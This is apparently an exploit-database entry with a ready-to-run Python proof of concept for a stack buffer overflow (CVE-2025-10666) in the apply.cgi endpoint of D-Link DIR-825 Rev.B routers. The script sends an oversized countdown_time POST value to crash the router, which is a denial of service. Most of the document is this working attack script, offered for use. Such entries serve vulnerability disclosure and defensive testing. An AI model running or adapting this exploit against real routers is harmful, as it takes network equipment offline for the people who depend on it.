D-Link DIR-825 Rev.B 2.10 Buffer Overflow

# Exploit Title: D-Link DIR-825 D-Link DIR-825 Rev.B 2.10 Buffer Overflow

# Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
# Google Dork: N/A
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://www.dlink.com/
# Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp
# Version: DIR-825 Rev.B <= 2.10
# Tested on: DIR-825 Rev.B physical hardware, local network
# CVE: CVE-2025-10666
#
# Description:
# A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the
# D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter.
# This PoC sends an overly long POST parameter to crash the process.

import requests

TARGET = "http://192.168.0.1/apply.cgi" # Change this to the router's IP
LENGTH = 4000 # Adjust length for testing / fuzzing
PAYLOAD = "1" * LENGTH

headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "http://192.168.0.1/",
}

data = {
"countdown_time": PAYLOAD
}

try:
print(f"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}")
r = requests.post(TARGET, headers=headers, data=data, timeout=5)
print(f"[+] Status Code: {r.status_code}")
print("[+] Exploit sent. Check if the router crashes or becomes unresponsive.")
except Exception as e:
print(f"[-] Failed to send exploit: {e}")